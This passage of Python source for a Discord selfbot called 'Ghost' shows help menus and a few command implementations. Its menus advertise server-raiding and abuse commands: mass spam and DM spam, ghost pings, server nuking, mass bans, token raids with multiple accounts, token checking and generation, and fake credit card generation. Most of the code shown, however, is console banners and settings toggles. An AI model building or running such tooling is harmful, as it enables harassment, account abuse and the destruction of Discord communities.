""")
embed.set_author(name="Selfbot Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Selfbot Commands ]
{Ghost.command_prefix}afkmode » Toggle afk mode.
{Ghost.command_prefix}settings » The bot's settings.
{Ghost.command_prefix}restart » Restart Ghost selfbot.
{Ghost.command_prefix}prefix [prefix] » Set the command prefix.
{Ghost.command_prefix}dumpchat [amount] (channel id) (oldest first, true/false) » Get the chat's history.
{Ghost.command_prefix}invite » Get Ghost's Discord server invite link.
{Ghost.command_prefix}addccmd [name] [response] » Add a custom command.
{Ghost.command_prefix}delccmd [name] » Delete a custom command.
{Ghost.command_prefix}detections » A list of all detections.
{Ghost.command_prefix}snipers » A list of all snipers.
{Ghost.command_prefix}enablesniper [type] » Enable a sniper.
{Ghost.command_prefix}disablesniper [type] » Disable a sniper.
{Ghost.command_prefix}enabledetect [type] » Enable a detection.
{Ghost.command_prefix}disabledetect [type] » Disable a detection.
{Ghost.command_prefix}riskmode » Disable and enable risk mode.
{Ghost.command_prefix}sounds » Toggle Ghost notification sounds.
{Ghost.command_prefix}notifications » Toggle Ghost notifications.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="webhook", description="Webhook related commands.", usage="webhook")
async def webhook(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**delwebhook [id]** » Delete a webhook from the ID.
`{Ghost.command_prefix}`**newwebhook [name]** » Create a webhook in the command channel.
`{Ghost.command_prefix}`**spamwebhook [amount] [url] (message)** » Spam the shit out of a webhook.
`{Ghost.command_prefix}`**webhooksetup** » Creates a new server with webhooks.
`{Ghost.command_prefix}`**webhookinfo [id]** » Information about the webhook.
""")
embed.set_author(name="Webhook Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Webhook Commands ]
{Ghost.command_prefix}delwebhook [id] » Delete a webhook from the ID.
{Ghost.command_prefix}newwebhook [name] » Create a webhook in the command channel.
{Ghost.command_prefix}spamwebhook [amount] [url] (message) » Spam the shit out of a webhook.
{Ghost.command_prefix}webhooksetup » Creates a new server with webhooks.
{Ghost.command_prefix}webhookinfo [id] » Information about the webhook.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="abuse", description="Abuse related commands.", usage="abuse")
async def abuse(ctx, page:int = 1):
if __riskmode__:
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**spam [amount] [delay] [message]** » Spam X amount of times.
`{Ghost.command_prefix}`**stopspam** » Stop spamming messages.
`{Ghost.command_prefix}`**dmspam [amount] [delay] [@user] [message]** » Spam DM messages X amount of times.
`{Ghost.command_prefix}`**channelspam [amount] [delay] [message]** » Spam a message X amount of times in every channel.
`{Ghost.command_prefix}`**threadspam [delay] [amount] [addusers | true/false] [name] [startmessage]** » Spam create threads with a starting message.
`{Ghost.command_prefix}`**ttsspam [amount] [delay] [message]** » Spam TTS messages X amount of times.
`{Ghost.command_prefix}`**reactspam [emoji] [messages]** » Spam reactions on X amount of messages.
`{Ghost.command_prefix}`**massghostping [delay] [@user]** » Ghost Ping the user in every channel.
`{Ghost.command_prefix}`**ghostping [@user]** » Ping a user then delete the message.
`{Ghost.command_prefix}`**massping (amount of messages) (send delay)** » Ping a mass amount of people in the command server.
`{Ghost.command_prefix}`**massnick [nickname]** » Change the nickname of all members in the command server.
`{Ghost.command_prefix}`**massdm [delay] [amount] [message]** » Send a DM message to everyone in the server.
`{Ghost.command_prefix}`**nukeserver** » Delete all roles and channels in the command server.
`{Ghost.command_prefix}`**destroyserver** » Completely destroy the command server.
`{Ghost.command_prefix}`**deletechannels** » Delete all of the command server's channels.
`{Ghost.command_prefix}`**deleteroles** » Delete all of the command server's roles.
`{Ghost.command_prefix}`**spamchannels [amount] (name)** » Spam create channels with a desired name. (Thanks Port <3)
`{Ghost.command_prefix}`**spamroles [amount] (name)** » Spam create roles with a desired name.
`{Ghost.command_prefix}`**raidjoin [delay] [invite]** » Make all your account tokens join a server.
`{Ghost.command_prefix}`**tokenraid [amount] [channel id] (message)** » Raid a server with all your account tokens.
`{Ghost.command_prefix}`**massban** » Ban all the members in the command server.
`{Ghost.command_prefix}`**masskick** » Kick all the members in the command server.
""")
embed.set_author(name="Abuse Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
{Ghost.command_prefix}spam [amount] [delay] [message] » Spam X amount of times.
{Ghost.command_prefix}stopspam » Stop spamming messages.
{Ghost.command_prefix}dmspam [amount] [delay] [@user] [message] » Spam DM messages X amount of times.
{Ghost.command_prefix}channelspam [amount] [delay] [message] » Spam X amount of times in all channels.
{Ghost.command_prefix}threadspam [delay] [amount] [addusers | true/false] [name] [startmessage] » Spam create threads with a starting message.
{Ghost.command_prefix}ttsspam [amount] [delay] [message] » Spam TTS messages X amount of times.
{Ghost.command_prefix}reactspam [emoji] [messages] » Spam reactions on X amount of messages.
{Ghost.command_prefix}massghostping [delay] [@user] » Ghost Ping the user in every channel.
{Ghost.command_prefix}ghostping [@user] » Ping a user then delete the message.
{Ghost.command_prefix}massping (amount of messages) (send delay) » Ping a mass amount of people in the command server.
{Ghost.command_prefix}massnick [nickname] » Change the nickname of all members in the command server.
{Ghost.command_prefix}massdm [delay] [amount] [message] » Send a DM message to everyone in the server.
{Ghost.command_prefix}nukeserver » Delete all roles and channels in the command server.
{Ghost.command_prefix}destroyserver » Completely destroy the command server.
{Ghost.command_prefix}deletechannels » Delete all of the command server's channels.
{Ghost.command_prefix}deleteroles » Delete all of the command server's roles.
{Ghost.command_prefix}spamchannels [amount] (name) » Spam create channels with a desired name. (Thanks Port <3)
{Ghost.command_prefix}spamroles [amount] (name) » Spam create roles with a desired name.
{Ghost.command_prefix}raidjoin [delay] [invite] » Make all your account tokens join a server.
{Ghost.command_prefix}tokenraid [amount] [channel id] (message) » Raid a server with all your account tokens.
{Ghost.command_prefix}massban » Ban all the members in the command server.
{Ghost.command_prefix}masskick » Kick all the members in the command server.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="Abuse Commands", color=__embedcolour__, description="You have risk mode disabled, so you can't use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, so you can't use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="tools", description="Discord and other tools.", usage="tools", aliases=["utilities", "utils"])
async def tools(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**tokeninfo [token]** » Information about a token.
`{Ghost.command_prefix}`**nuketoken [token]** » Nuke a token.
`{Ghost.command_prefix}`**checktoken [token]** » Checks if a token is working.
`{Ghost.command_prefix}`**checktokens** » Check your tokens.
`{Ghost.command_prefix}`**nitrogen** » Generate a nitro code.
`{Ghost.command_prefix}`**tokengen** » Generate a discord user token.
`{Ghost.command_prefix}`**identitygen** » Generate a fake identity.
`{Ghost.command_prefix}`**passwordgen [length]** » Generate a secure password.
`{Ghost.command_prefix}`**ccgen** » Generate a fake credit card.
`{Ghost.command_prefix}`**eval** » very scary and haram.
""")
embed.set_author(name="Tools (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Tools ]
{Ghost.command_prefix}tokeninfo [token] » Information about a token.
{Ghost.command_prefix}nuketoken [token] » Nuke a token.
{Ghost.command_prefix}checktoken [token] » Checks if a token is working.
{Ghost.command_prefix}checktokens » Check your tokens.
{Ghost.command_prefix}nitrogen » Generate a nitro code.
{Ghost.command_prefix}tokengen » Generate a discord user token.
{Ghost.command_prefix}identitygen » Generate a fake identity.
{Ghost.command_prefix}passwordgen [length] » Generate a secure password.
{Ghost.command_prefix}ccgen » Generate a fake credit card.
{Ghost.command_prefix}eval » very scary and haram.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="giveaway", description="Giveaway related commands.", usage="giveaway")
async def giveaway(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}",
color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**gstart [duration] [winners] [prize]** » Start a giveaway in the same channel
`{Ghost.command_prefix}`**gend [message id]** » End a giveaway
`{Ghost.command_prefix}`**greroll [message id]** » Re-roll a giveaway
""")
embed.set_author(name="Giveaway Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Giveaway Commands ]
{Ghost.command_prefix}gstart [duration] [winners] [prize] » Start a giveaway in the same channel
{Ghost.command_prefix}gend [message id] » End a giveaway
{Ghost.command_prefix}greroll [message id] » Re-roll a giveaway
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="proxy", description="Proxy related commands.", usage="proxy")
async def proxy(ctx, page:int=1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}",
color=__embedcolour__, description=f"""
`{Ghost.command_prefix}`**proxies http** » Scrape HTTP proxies.
`{Ghost.command_prefix}`**proxies https** » Scrape HTTPS proxies.
`{Ghost.command_prefix}`**proxies socks4** » Scrape SOCKS4 proxies.
`{Ghost.command_prefix}`**proxies socks5** » Scrape SOCKS5 proxies.
`{Ghost.command_prefix}`**proxies all** » Scrape HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.
""")
embed.set_author(name="Proxy Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Proxy Commands ]
{Ghost.command_prefix}proxies http » Scrape HTTP proxies.
{Ghost.command_prefix}proxies https » Scrape HTTPS proxies.
{Ghost.command_prefix}proxies socks4 » Scrape SOCKS4 proxies.
{Ghost.command_prefix}proxies socks5 » Scrape SOCKS5 proxies.
{Ghost.command_prefix}proxies all » Scrape HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="hiddenchannels", description="Sends a list of all the channels you can't see.", usage="hiddenchannels (guild id)")
async def hiddenchannels(ctx, guild=None):
if guild is None:
guild = ctx.guild
else:
guild = await Ghost.fetch_guild(int(guild))
hiddenChannels = []
message = await ctx.send("Looking for hidden channels, this could take a while...")
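# Probe each non-category channel through the REST API; a non-200 response means this account cannot see the channel.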
for channel in guild.channels:
if str(channel.type).lower() != "category":
request = requests.get(f"https://discord.com/api/channels/{channel.id}", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
if __embedmode__:
hiddenChannels.append("#"+channel.name)
else:
hiddenChannels.append(channel.name)
print_info(f"{channel.name} is hidden.")
else:
print_info(f"{channel.name} is not hidden.")
# await asyncio.sleep(1)
if __embedmode__:
embed = discord.Embed(title="Hidden Channels", description=f"There are a total of `{len(hiddenChannels)}` hidden channels.\n \n```{', '.join(hiddenChannels)}```", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed, delete_after=__deletetimeout__)
else:
await message.edit(content=f"""```ini
[ Hidden Channels ]
There are a total of {len(hiddenChannels)} hidden channels.
{', '.join(hiddenChannels)}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="clearconsole", description="Clear your console.", usage="clearconsole", aliases=["resetconsole", "consoleclear", "consolereset", "consoleCommand-clearconsole", "consoleCommand-clear"])
async def clearconsole(ctx):
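# Clear the terminal and redraw the startup banner that matches the configured consoleMode.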
width = os.get_terminal_size().columns
if is_windows():
os.system("cls")
os.system(f"title Ghost [{version}] [{Ghost.user}]")
# if is_windows():
# def startupPath():
# return str(shell.SHGetFolderPath(0, (shellcon.CSIDL_STARTUP, shellcon.CSIDL_COMMON_STARTUP)[0], None, 0))
# os.system("cls")
# os.system(f"title Ghost [{version}] [{Ghost.user}]")
# if (CONFIG["load_on_startup"] == True):
# print("Adding to startup.......")
# USER_NAME = getpass.getuser()
# def add_to_startup(file_path=""):
# if file_path == "":
# file_path = os.path.dirname(os.path.realpath(__file__))
# bat_file = open(startupPath() + r"\\Ghost.bat", "w")
# bat_file.write(f"cd {file_path}\nstart Ghost")
# bat_file.close()
# add_to_startup()
# else:
# print("Removing from startup......")
# if os.path.exists(startupPath() + r"\\Ghost.bat"): os.remove(startupPath() + r"\\Ghost.bat");
# os.system("cls")
if is_linux():
os.system("clear")
if consoleMode.lower() == "new":
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rainbow":
print("")
print(fg.consoleColour + "")
print(fg.cRed + " ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print(fg.cOrange + "██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print(fg.cYellow + "██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print(fg.cGreen + "██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print(fg.cBlue + "╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(fg.cPurple + " ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new2":
print("")
print(fg.consoleColour + "")
print(" ______ __ __ ______ ______ ______ ".center(width))
print("/\ ___\ /\ \_\ \ /\ __ \ /\ ___\ /\__ _\ ".center(width))
print("\ \ \__ \ \ \ __ \ \ \ \/\ \ \ \___ \ \/_/\ \/ ".center(width))
print(" \ \_____\ \ \_\ \_\ \ \_____\ \/\_____\ \ \_\ ".center(width))
print(" \/_____/ \/_/\/_/ \/_____/ \/_____/ \/_/ ".center(width))
print(" ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new3":
print("")
print(fg.consoleColour + "")
print(" 88 ".center(width))
print(" 88 ,d ".center(width))
print(" 88 88 ".center(width))
print(" ,adPPYb,d8 88,dPPYba, ,adPPYba, ,adPPYba, MM88MMM ".center(width))
print('a8" `Y88 88P\' "8a a8" "8a I8[ "" 88 '.center(width))
print('8b 88 88 88 8b d8 `"Y8ba, 88 '.center(width))
print('"8a, ,d88 88 88 "8a, ,a8" aa ]8I 88, '.center(width))
print(' `"YbbdP"Y8 88 88 `"YbbdP"\' `"YbbdP"\' "Y888 '.center(width))
print(' aa, ,88 '.center(width))
print(' "Y8bbdP" '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new4":
print("")
print(fg.consoleColour + "")
print(" ▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ".center(width))
print(" ███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ".center(width))
print(" ███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ".center(width))
print(" ▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ".center(width))
print('▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ███ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ▄█ ███ ███ '.center(width))
print(' ████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "bear":
if is_windows():
os.system("mode con: cols=90 lines=24")
print("")
print(fg.consoleColour + "")
print(" ▄▀▀▀▄▄▄▄▄▄▄▀▀▀▄ ".center(os.get_terminal_size().columns))
print(" █▒▒░░░░░░░░░▒▒█ ".center(os.get_terminal_size().columns))
print(" █░░█░░░░░█░░█ ".center(os.get_terminal_size().columns))
print(" ▄▄ █░░░▀█▀░░░█ ▄▄ ".center(os.get_terminal_size().columns))
print(" █░░█ ▀▄░░░░░░░▄▀ █░░█ ".center(os.get_terminal_size().columns))
print("█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█".center(os.get_terminal_size().columns))
print("█░█▀▀░░█ █░░█▀█░░█▀░░▀█▀░█".center(os.get_terminal_size().columns))
print("█░█▄█░░█▀█░░█▄█░░▄█░░ █ ░█".center(os.get_terminal_size().columns))
print("█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█".center(os.get_terminal_size().columns))
print("")
print(fg.cWhite + f"{motd}".center(os.get_terminal_size().columns))
print(fg.consoleColour + '─'*os.get_terminal_size().columns)
print("")
elif consoleMode.lower() == "old":
print("")
print(fg.consoleColour + "")
print(" ▄████ ██░ ██ ▒█████ ██████ ▄▄▄█████▓".center(width))
print(" ██▒ ▀█▒▓██░ ██▒▒██▒ ██▒▒██ ▒ ▓ ██▒ ▓▒".center(width))
print("▒██░▄▄▄░▒██▀▀██░▒██░ ██▒░ ▓██▄ ▒ ▓██░ ▒░".center(width))
print("░▓█ ██▓░▓█ ░██ ▒██ ██░ ▒ ██▒░ ▓██▓ ░ ".center(width))
print("░▒▓███▀▒░▓█▒░██▓░ ████▓▒░▒██████▒▒ ▒██▒ ░ ".center(width))
print(" ░▒ ▒ ▒ ░░▒░▒░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ".center(width))
print(" ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ░▒ ░ ░ ░ ".center(width))
print("░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ ░ ".center(width))
print(" ░ ░ ░ ░ ░ ░ ░ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
elif consoleMode not in consoleModes:
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "react":
print("")
print(fg.consoleColour + "")
print("██████╗ ███████╗ █████╗ ██████╗████████╗".center(width))
print("██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝".center(width))
print("██████╔╝█████╗ ███████║██║ ██║ ".center(width))
print("██╔══██╗██╔══╝ ██╔══██║██║ ██║ ".center(width))
print("██║ ██║███████╗██║ ██║╚██████╗ ██║ ".center(width))
print("╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rise":
print(fg.cBlue + "")
print("██████╗ ██╗███████╗███████╗ ███████╗███████╗██╗ ███████╗██████╗ ██████╗ ████████╗".center(width))
print("██╔══██╗██║██╔════╝██╔════╝ ██╔════╝██╔════╝██║ ██╔════╝██╔══██╗██╔═══██╗╚══██╔══╝".center(width))
print("██████╔╝██║███████╗█████╗ ███████╗█████╗ ██║ █████╗ ██████╔╝██║ ██║ ██║ ".center(width))
print("██╔══██╗██║╚════██║██╔══╝ ╚════██║██╔══╝ ██║ ██╔══╝ ██╔══██╗██║ ██║ ██║ ".center(width))
print("██║ ██║██║███████║███████╗ ███████║███████╗███████╗██║ ██████╔╝╚██████╔╝ ██║ ".center(width))
print("╚═╝ ╚═╝╚═╝╚══════╝╚══════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ".center(width))
print("╭─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╮")
print(fg.cGrey + f"Connected: {Ghost.user} | Prefix: {Ghost.command_prefix} | Servers: {len(Ghost.guilds)}".center(width))
print(fg.cBlue + "╰─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╯")
print("")
print(fg.cBlue + '━'*width)
print("")
if consoleMode.lower() == "nighty":
if is_windows():
os.system("mode con: cols=90 lines=24")
os.system("cls")
if is_linux():
os.system("resize -s 24 90")
os.system("clear")
print("")
print(f" {fg.cWhite}██████{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}╗ {fg.cWhite}██████{fg.cBlue}╗ {fg.cWhite}███████{fg.cBlue}╗{fg.cWhite}████████{fg.cBlue}╗")
print(f" {fg.cWhite}██{fg.cBlue}╔════╝ {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}╔═══{fg.cWhite}██{fg.cBlue}╗{fg.cWhite}██{fg.cBlue}╔════╝╚══{fg.cWhite}██{fg.cBlue}╔══╝")
print(f" {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}███{fg.cBlue}╗{fg.cWhite}███████{fg.cBlue}║{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}███████{fg.cBlue}╗ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}╔══{fg.cWhite}██{fg.cBlue}║{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║╚════{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cBlue}╚{fg.cWhite}██████{fg.cBlue}╔╝{fg.cWhite}██{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║╚{fg.cWhite}██████{fg.cBlue}╔╝{fg.cWhite}███████{fg.cBlue}║ {fg.cWhite}██{fg.cBlue}║ ")
print(f" {fg.cBlue}╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ")
print("")
print(f"{fg.cWhite}Status: {fg.cGreen}Connected")
print(f"{fg.cWhite}Account: {Ghost.user} [{len(Ghost.guilds)} servers] [{len(get_friends(__token__))} friends]")
print(f"{fg.cWhite}Prefix: {Ghost.command_prefix}")
print(fg.cWhite + '─'*os.get_terminal_size().columns)
# def getCurrentTime():
# return datetime.now().strftime("%H:%M")
# def print_important(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPurple}[Important] {fg.cGrey} | {message}")
# def print_info(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cYellow}[Information] {fg.cGrey} | {message}")
# def print_cmd(command):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.consoleColour}[Command] {fg.cGrey} | {Ghost.command_prefix}{command}")
# def print_sharecmd(author, command):
# print(f"{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
# def print_error(error):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cRed}[Error] {fg.cGrey} | {error}")
# def print_detect(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPink}[Detect] {fg.cGrey} | {message}")
# def print_sniper(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {message}")
# def print_sniper_info(firstmessage, secondmessage):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {firstmessage} | {secondmessage}")
if "beta" in version.lower():
print_important("You're currently using a beta build of Ghost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
elif "dev" in version.lower():
print_important("You're currently using a developer build of Ghost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
@Ghost.command(name="blocksend", description="Send a message to a blocked user.", usage="blocksend [user id] [messages]", aliases=["sendblocked", "sendtoblocked"])
async def blocksend(ctx, userid:int, *, message):
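# Temporarily unblock the user, deliver the message, then block them again.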
user = await Ghost.fetch_user(userid)
await user.unblock()
await user.send(message)
await user.block()
if __embedmode__:
embed = discord.Embed(title=f"Block Send", description=f"Sent `{message}` to {user}.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Sent `{message}` to {user}.", delete_after=__deletetimeout__)
@Ghost.command(name="riskmode", description="Disable and enable risk mode", usage="riskmode")
async def riskmode(ctx):
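# Flip the risk mode flag and persist it to the config so the setting survives restarts.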
global __riskmode__
riskModeText = ""
if __riskmode__:
__riskmode__ = False
cfg = Config.getConfig()
cfg["riskmode"] = False
Config.saveConfig(cfg)
riskModeText = "disabled"
else:
__riskmode__ = True
cfg = Config.getConfig()
cfg["riskmode"] = True
Config.saveConfig(cfg)
riskModeText = "enabled"
if __embedmode__:
embed = discord.Embed(description=f"Risk mode has been {riskModeText}.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Risk mode has been {riskModeText}.", delete_after=__deletetimeout__)
@Ghost.command(name="embedmode", description="Toggle embed mode.", usage="embedmode")
async def embedmode(ctx):
global __embedmode__
if not __embedmode__:
__embedmode__ = True
cfg = Config.getConfig()
cfg["embed_mode"] = True
Config.saveConfig(cfg)
if __embedmode__:
embed = discord.Embed(title=f"Embed mode has been enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Embed mode has been enabled.", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title=f"Embed mode is already enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Embed mode is already enabled.", delete_after=__deletetimeout__)
@Ghost.command(name="textmode", description="Toggle text mode.", usage="textmode")
async def textmode(ctx):
global __embedmode__
if __embedmode__:
__embedmode__ = False
cfg = Config.getConfig()
cfg["embed_mode"] = False
Config.saveConfig(cfg)
if __embedmode__:
embed = discord.Embed(title=f"Text mode has been enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Text mode has been enabled.", delete_after=__deletetimeout__)
else:
if __embedmode__:
